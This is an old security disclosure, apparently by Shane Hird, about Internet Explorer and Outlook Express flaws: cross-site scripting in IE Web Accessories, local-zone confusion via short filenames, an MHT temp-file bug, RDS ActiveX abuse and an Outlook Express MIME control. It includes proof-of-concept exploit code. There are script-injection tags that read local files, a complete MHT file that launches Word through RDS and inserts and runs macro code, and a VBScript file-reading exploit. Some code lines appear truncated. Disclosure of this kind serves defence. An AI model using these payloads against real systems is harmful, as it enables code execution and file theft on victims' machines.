CSS, RDS, Outlook Express




    Shane Hird found following.  All these issues have been  disclosed
    to MS, however no action has  been taken so one would assume  they
    have decided not to patch the following problems.

    Cross site scripting issues have  been known for quite while  now,
    in fact  a long  time before  the recent  CERT advisory  about the
    matter,  MS  have  had  in  place  security measures for this ever
    since they started displaying custom local 404 error messages  and
    others.                     Taken          directly           from

        // Security precaution: must filter out "urlResult" and "displayresult"
        forbiddenChars = new RegExp("[<>\'\"]", "g");	// Global search/replace
        urlresult = urlresult.replace(forbiddenChars, "");
        displayresult = displayresult.replace(forbiddenChars, "");

    Obviously, because  the page  will be  displaying remotely defined
    strings  in  the  local  zone,  MS  have  filtered out 'dangerous'
    characters,  which   is  fair   enough.  Without   this   security
    precaution, this page  and others could  easily be exploited.   In
    fact,  there  are  certain  ones  which  are,  which will be shown
    later, although they are a minor problem.

    There are a few  problems with the RES  and MK and probably  other
    protocols  in  that  they  dont  recognise  the temporary internet
    files as an internet zone  when specified in short 8  char format.
    ie, the following will be opened in the 'local' zone whereas  they
    would  normally  be  opened  in  the  'Internet' zone if specified
    using LFN.


    This may not be much of  an issue due to the fact  that 'XXXXXXXX'
    is a random string and pretty much impossible to guess.   However,
    outlook  places  TEMP  files  in  the  TEMP  directory  (not   the
    temporary internet files directory)  and places temp HTM  files in
    the root of the Temporary  Internet Files directory so it  is easy
    to guess the location. And  HTM files can be extracted  and opened
    (in  the  'local'  zone)  from  the  likes  of MID files so can be
    exploited  in  a  similar  fashion  to  the  Active Setup problem,
    although  it  would  simply  be  a  CSS  exploit  (which  can   be
    potentially  serious,  see  later).   The  are  various  ways   of
    exploiting this through outlook  using various protocols and  file
    formats etc, we won't list  them here, but basically by  not using
    a local temp  directory and instead  a random temp  internet files
    directory it would solve most of the problems.

    Web Accessories CSS Bug
    MS have  released extensions  to IE  that allow  viewing an  image
    list,  URL  list  and  document  tree  among  other things.  These
    extensions are essentially just HTM files which parse the  current
    HTM file and display results  using script, which is shown  in the
    local zone.  Immediately one  realises that this can be  exploited
    if we can  define the strings  which are displayed,  which we can.
    Each of the below lines will  display a text file when one  of the
    extensions is used  on the current  HTM file.   This is a  typical
    CSS bug, which can be exploited  further with the use of RDS,  see

    Document Tree Exploit:
        <OBJECT ID="<SCRIPT>'file://c:/test.txt');alert('wait');alert(a.document.body.innerText);</SCRIPT>"  CLASSID="CLSID:0"></OBJECT>

    URL List Exploit:
        <a href="<SCRIPT>'file://c:/test.txt');alert('wait');alert(a.document.body.innerText);</SCRIPT>"></a>

    Image List Exploit:
        <IMG src="<SCRIPT>'file://c:/test.txt');alert('wait');alert(a.document.body.innerText);</SCRIPT>">

    MHT Temp File CSS Bug
    A typical Temp file vulnerability. IE5 (or one of them) introduced
    the new 'Web Archive' format for storing web pages, which have the
    extension MHT.   IE5 essentially takes  each file which  is needed
    for display of the page  and encodes sequentially to a  single MHT
    file in  the format  of a  MIME message,  7bit and Base64 encoding
    and all, it even  has a 'From:' field.  (this by the way  makes it
    difficult to send and recieve MHT attachments because outlook,  or
    perhaps the mail server,  converts it into MSG  format, completely
    destroying the original file).

    When parsing  the MHT  file, IE  extracts each  file and places it
    into a single locked TMP  file, however if the file  referenced is
    in a frame  or an IFRAME,  the file is  extracted and placed  into
    its own unlocked file in the local temp directory, with  guessable
    names,  in  fact,  even  definable  names.  An  example exploit is
    included with the note about RDS.

    RDS ActiveX Control Bug
    A new  ActiveX control  included with  Visual Studio  and probably
    IIS and other databasey type applications. Anyway, when invoked in
    the local  zone one  can avoid  the 'ActiveX'  warning by creating
    business  objects  via   DCOM  using  IP  instead   of
    'in-process' and  from there  take on  pratically any  action with
    permissions dependent  on the  current DCOM  settings and  current
    user.   This works  on default  configurations of  any Win machine
    with RDS installed.

    This example fires up MS word and runs a custom macro, which  from
    there you can take on any action at all.  The example is  included
    as part of the MHT exploit, which will extract a file to the  temp
    directory and  open it.   Hopefully this  won't get  stuffed up by
    any 'smart' mail server.

        <------------------------ snip MHTExp.MHT --------------------->
        From: <Saved by Microsoft Internet Explorer 5>
        Subject: MHT Exploit
        Date: Thu, 17 Feb 2000 19:31:45 +1000
        MIME-Version: 1.0
        Content-Type: multipart/alternative;
        X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600
        This is a multi-part message in MIME format.
        Content-Type: text/html;
        Content-Transfer-Encoding: 7bit
        Content-Location: MHTEXploit
        <title>MHT Exploit</title>
        <frameset cols="*">
	        <frame name="local" src="file:Exploit.htm">
        Content-Type: text/html;
        Content-Transfer-Encoding: 7bit
        Content-Location: file:Exploit.htm
        <script language="VBScript"><!--
        if location.protocol <> "file:" then
	        document.writeln("Exploiting MHT temp file vuln - Shane Hird")
	        'Note - Replace with required temp directory.
        "file://C:\Documents and Settings\Shane\Local
	        msgbox("Running in local context")
	        set rds = CreateObject("RDS.DataSpace")
	        set busobj = rds.CreateObject("Word.Application", "")
	        busobj.visible = TRUE
	        Set NT = busobj.Templates(1).VBProject.VBComponents(1).CodeModule
	        NT.DeleteLines 1, NT.CountOfLines
	        NT.InsertLines 1, "Public Sub Example()"
	        NT.InsertLines 2, "	MsgBox (" + Chr(34) + "Example Code..." + Chr(34) + ")"
	        NT.InsertLines 3, "End Sub" "Normal.ThisDocument.Example"
	        NT.DeleteLines 1, NT.CountOfLines
	        set NT = Nothing
        end if
        <---------------- snip MHTExp.mht ------------------->

    Outlook Express ActiveX Exploit
    There is also this old exploit which apparently got fixed in  IE5,
    but was never announced. It will allow reading of any file on  the
    users  machine,  after  the  first  newline  of  the file using an
    ActiveX provided by Outlook Express.

        <object id="MIME" classid="clsid:1C82EAD9-508E-11D1-8DCF-00C04FB951F9" width="500" height="150"></object>

        <script language="Vbscript"><!--

        msgbox("Please wait while control is loaded..." + Chr(10) + "Outlook Express
        MIME Editor Exploit" + Chr(10) + "Written by: Shane Hird")
        msgbox("File Loaded")
        document.write("<P>File is displayed below</P><HR><PRE>")



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